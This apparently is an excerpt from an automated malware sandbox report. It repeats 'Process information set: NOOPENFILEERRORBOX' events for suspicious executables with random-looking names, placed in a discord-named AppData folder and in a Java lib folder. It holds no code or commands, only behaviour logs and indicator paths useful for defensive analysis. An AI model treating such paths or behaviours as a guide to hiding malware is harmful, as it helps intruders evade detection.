                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess information set: NOOPENFILEERRORBOX
